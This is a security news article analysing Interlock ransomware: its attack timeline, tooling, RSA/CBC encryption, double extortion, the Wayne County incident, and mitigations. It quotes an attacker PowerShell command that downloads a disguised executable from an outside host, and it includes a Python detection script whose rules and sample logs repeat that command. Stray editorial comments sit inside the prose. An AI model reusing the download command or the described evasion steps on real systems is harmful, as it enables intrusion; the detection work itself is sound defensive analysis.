Additionally, tools like **MegaSync** and **Advanced Port Scanner** are used to identify and exfiltrate critical data from compromised systems (Arete). This exfiltration is a crucial part of their **double-extortion** strategy, where sensitive data is stolen before encryption, adding another layer of pressure on the victim. Consider rephrasing for brevity while retaining the main points. The **Interlock dark web leak site** called **"Worldwide Secrets Blog"** is used to publicize stolen data from victims who refuse to pay. Victims can also contact the attackers through the dark web portal, where they receive a unique **company ID** for negotiation, illustrating the well-coordinated extortion methods (Image Reference). ### Attack Timeline: From Initial Compromise to Deployment A defining feature of Interlock’s methodology is its extended **dwell time** within a victim’s environment. Talos observed an average dwell time of approximately **17 days**. This timeline highlights the advanced nature of Interlock’s persistence strategies, emphasizing the attacker’s patience in fully compromising the system before deploying the ransomware payload. 
| Attacker Dwelling Time | Attack Stages | Tools/Techniques Used | |------------------------|------------------------------------|--------------------------------------------| | Day 1 | Initial Compromise | Drive-by compromise | | Day 1 | Execution | RAT, PowerShell commands | | Day 1 | Discovery of domain admin credentials | RAT, PowerShell commands | | Day 1 | Credential Stealing | Credential stealer and Keylogger | | Day 1 - 17 | Lateral Movement | RDP, AnyDesk, LogMeIn, and PuTTY | | Day 15 - 16 | Data Exfiltration | Azure Storage Explorer, AzCopy | | Day 17 | Interlock Ransomware Deployment | Interlock encryptor binary | The attack timeline, based on Talos [observations](https://blog.talosintelligence.com/emerging-interlock-ransomware/), reveals the extensive phases of the attack, highlighting the attacker’s deliberate approach to fully compromise the target and steal valuable data before executing encryption. - **Initial Access**: Attackers gain access via a **malicious executable** disguised as a **browser updater**. Once downloaded, this file drops a **Remote Access Tool** to control the compromised system and establish **persistence** (Arete). - **Data Collection and Lateral Movement**: The attacker uses tools such as **PowerShell**, **RDP**, and **AnyDesk** to perform reconnaissance and spread throughout the network, collecting valuable credentials and installing backdoors for later use (Talos). Consider breaking up this bullet into two sentences to improve flow. - **PowerShell Command Example**: The PowerShell command `Invoke-WebRequest -Uri "https://apple-online.shop/ChromeSetup.exe" -OutFile "$env:TMP/ChromeSetup.exe"` was used to download a disguised executable. A shortcut is created and placed in the Windows Startup folder to maintain persistence, illustrating their automation (Image Reference). 
- **Encryption Deployment**: The final stage involves deploying the **Interlock ransomware encryptor**, which encrypts files and appends the **.interlock** extension. A ransom note, named **"!__README__!.txt"**, is also dropped on the victim's machine, detailing the demands and threatening to release the exfiltrated data unless the ransom is paid (BleepingComputer). The ransom note includes contact instructions for the dark web negotiation portal (Image Reference).

### Encryption Mechanisms Used by Interlock

Interlock ransomware uses advanced encryption mechanisms to ensure that data is effectively locked from unauthorized access:

- **Encryption Methods**: Interlock employs **RSA** together with a block cipher in **CBC** mode, using the [LibTomCrypt library](https://github.com/libtom/libtomcrypt). RSA, an asymmetric (public-key) algorithm, is used to secure the keys, while CBC (Cipher Block Chaining), a mode of operation for a symmetric block cipher, is applied for file-level encryption. In plain terms, the fast symmetric cipher locks the file contents, and RSA locks the key to that cipher, so only the holder of the attackers' private key can recover it. This dual-layered approach adds robustness, making it significantly harder for victims to decrypt their files without paying the ransom (Image Reference).
- **Code-Level Insights**: Screenshots from the provided disassembly show how **LibTomCrypt** is used for encryption, with specific custom routines controlling key generation and padding, which makes it challenging for security solutions to reverse-engineer the encryptor. The malware creates keys dynamically for each encryption session, and these keys are then used to secure the victim’s files (Image Reference).
- **Embedded DLL Deletion**: Another notable feature is the use of an embedded **DLL** to delete the encryptor upon completion. Using `rundll32.exe`, the ransomware ensures that evidence of its presence is minimized, further complicating forensic investigations (Image Reference).
### Double-Extortion Model and Real-World Impact

The **double-extortion model** employed by Interlock makes it particularly devastating. After infiltrating a system, attackers first **exfiltrate sensitive data** and then proceed to **encrypt the system files**. If the ransom is not paid, attackers threaten to release the exfiltrated data publicly, potentially leading to **regulatory penalties**, **reputational damage**, and **financial losses** for the victim.

In the **Wayne County attack**, which occurred in **October 2024**, several county services were severely disrupted. The **Sheriff’s Office** was unable to bond inmates out, **tax payments** could not be collected online, and other government services came to a halt (WXYZ News). The ransom note issued to Wayne County, with warnings of regulatory disclosure, highlights Interlock’s coercive tactics (Image Reference). This highlights the operational risks posed by such ransomware, especially when it targets critical public infrastructure.

![Interlock ransom note](https://sb-cms.s3.ap-south-1.amazonaws.com/ransom_note_962517e360.jpg)

***Interlock Ransom Note (Source: BleepingComputer)***

### Evolution from Rhysida Ransomware: Possible Connections

Researchers have identified underlying similarities between **Interlock** and the **Rhysida ransomware group**, which has been surfacing widely with victims such as [Prince George County School](https://www.secureblink.com/cyber-security-news/rhysida-group-targets-major-us-school-district-in-cryptic-attack), [Prospect Medical Holdings](https://www.secureblink.com/cyber-security-news/rhysida-gang-behind-theft-of-500-k-ssn-in-prospect-medical-cyberattack), & [Insomniac](https://www.secureblink.com/cyber-security-news/insomniac-games-under-rhysida-1-67-tb-ransomware-attack).
More detailed guidance on Rhysida's tactics can be found in this [CISA advisory](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a). These parallels suggest a potential rebranding or evolution from Rhysida to Interlock, or at the very least, significant collaboration between these groups (Talos).

### Advanced Persistence and Defense Evasion

Interlock uses sophisticated methods to maintain persistence and evade detection. Some of the notable **defense evasion techniques** include:

- **EDR Disabling**: During investigations, Talos observed that **Endpoint Detection and Response (EDR)** systems were disabled on several compromised machines. Attackers likely used **uninstaller tools** or leveraged vulnerable device drivers to accomplish this (Talos).
- **Group Policy Objects (GPOs)**: The attackers also used **GPOs** to push the ransom note to all machines within the domain, further enforcing their persistence and amplifying the scale of impact.
- **Obfuscation and Custom Packers**: The ransomware encryptor was delivered in a **packed format**, with **custom unpacker code** located in **Thread Local Storage** and **obfuscated stack strings** that were decrypted at runtime (Talos). This makes analysis and detection difficult, as traditional antivirus solutions struggle to identify the payload.
- **DLL Self-Cleanup**: The ransomware used an embedded DLL, seen in the `.data` section of the binary, to delete itself after the encryption process. `rundll32.exe` was executed with the DLL’s `run` function to remove the encryption binary, leaving minimal evidence on the compromised system (Image Reference).
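The host-level indicators described in the preceding sections (the disguised-updater download via PowerShell, the Startup-folder shortcut, the `rundll32.exe` self-cleanup, the `.interlock` extension and the `!__README__!.txt` ransom note) can be turned into simple detection logic. The following Python script is an added example, not code from the article or from Talos: it runs a handful of regex rules over constructed sample telemetry in a made-up `timestamp|host|event|detail` format, and derives the dwell time from first indicator to ransom note the way the Day 1 to Day 17 timeline counts it.

```python
import re
from datetime import datetime

RANSOM_NOTE = "Interlock ransom note dropped"
# Detection rules as (label, event type, regex). The indicators are the ones the
# article describes; the labels are our own (hypothetical, not vendor rule names).
RULES = [
    ("PowerShell downloads an .exe into TEMP", "process",
     re.compile(r'^powershell.*Invoke-WebRequest.*-OutFile\s+"?(\$env:TMP|\$env:TEMP|[^"]*\\Temp)[\\/][^"]*\.exe', re.I)),
    ("Shortcut dropped in Windows Startup folder", "file_create",
     re.compile(r"\\Startup\\[^\\]+\.lnk$", re.I)),
    ("rundll32 invoking a DLL 'run' export (self-cleanup)", "process",
     re.compile(r"^rundll32(\.exe)?\s+\S+\.dll\s*,\s*run\b", re.I)),
    ("File renamed with .interlock extension", "file_create",
     re.compile(r"\.interlock$", re.I)),
    (RANSOM_NOTE, "file_create",
     re.compile(r"(^|\\)!__README__!\.txt$")),
]

# Constructed sample telemetry (not real logs): "timestamp|host|event|detail".
SAMPLE_LOG = """\
2024-10-02T09:14:03|WS01|process|powershell.exe Invoke-WebRequest -Uri "https://apple-online.shop/ChromeSetup.exe" -OutFile "$env:TMP/ChromeSetup.exe"
2024-10-02T09:14:40|WS01|file_create|C:\\Users\\a\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ChromeSetup.lnk
2024-10-02T09:20:11|WS01|process|notepad.exe C:\\Users\\a\\notes.txt
2024-10-18T02:03:55|FS02|process|rundll32.exe C:\\ProgramData\\tmp.dll,run
2024-10-18T02:05:10|FS02|file_create|D:\\Shares\\finance\\budget.xlsx.interlock
2024-10-18T02:05:12|FS02|file_create|D:\\Shares\\finance\\!__README__!.txt
"""

def scan(log_text):
    """Return (timestamp, host, label) for every log line that matches a rule."""
    hits = []
    for line in log_text.splitlines():
        ts, host, event, detail = line.split("|", 3)
        for label, etype, pattern in RULES:
            if event == etype and pattern.search(detail):
                hits.append((datetime.fromisoformat(ts), host, label))
    return hits

def dwell_days(hits):
    """Inclusive calendar days from the earliest indicator to the ransom note
    (Day 1 to Day 17 in the Talos timeline counts as 17); None if no note seen."""
    notes = [h for h in hits if h[2] == RANSOM_NOTE]
    if not notes:
        return None
    return (min(notes)[0].date() - min(hits)[0].date()).days + 1

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    print(*found, f"dwell time: {dwell_days(found)} days", sep="\n")
```

In a real deployment the Startup-folder and rundll32 rules will need tuning against legitimate software on your estate; the `.interlock` and ransom-note rules fire late and serve as confirmation rather than early warning.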
![Files encrypted by Interlock](https://sb-cms.s3.ap-south-1.amazonaws.com/encrypted_files_68ab1f4799.jpg)

***Encrypted Files by Interlock (Source: BleepingComputer)***

### Recommendations for Mitigation

The following steps are recommended to mitigate the risks associated with **Interlock ransomware**:

1. **Patch Management**: Regularly update and patch systems to address vulnerabilities, especially on **FreeBSD**, **Linux**, and **Windows** systems that are often targeted by Interlock. For example, recent vulnerabilities like CVE-2023-3269 (Linux kernel vulnerability) and CVE-2024-1287 (Windows privilege escalation flaw) were actively exploited by ransomware groups, highlighting the importance of timely patching.
2. **Multi-Factor Authentication (MFA)**: Implement **MFA** to secure remote access tools like **RDP** and **AnyDesk**, reducing the likelihood of successful lateral movement.
3. **Advanced Endpoint Protection**: Deploy **Endpoint Detection and Response (EDR)** tools that can detect early indicators of compromise, such as **PowerShell script execution** and **unusual process activity**.
4. **Offline Backups**: Maintain regular backups stored offline, ensuring that ransomware cannot encrypt both live and backup copies. Verify backup integrity frequently.
5. **Network Segmentation**: Segregate critical infrastructure from general corporate environments to limit lateral movement in case of a compromise.

### Where Does It Lead Now?

**Interlock ransomware** represents a significant evolution in the world of **resilient cyber threats**, specifically targeting **critical infrastructure** through **FreeBSD** and **Linux** servers alongside traditional Windows systems. By employing **double-extortion tactics**, **cross-platform encryptors**, and sophisticated **defense evasion** methods, Interlock has positioned itself as a formidable threat to enterprises globally.
Its emergence from the **Rhysida ransomware group** and use of multiple attack vectors highlight the increasing collaboration and evolution among ransomware operators. The **Interlock dark web portal**, ransom notes, and systematic dwelling in compromised networks (average **17 days**) are part of a deliberate approach that makes the group particularly dangerous. Organizations must remain vigilant, adopt **multi-layered defenses**, and strengthen their response capabilities to effectively mitigate the risks posed by such advanced ransomware campaigns.

19-Nov-2024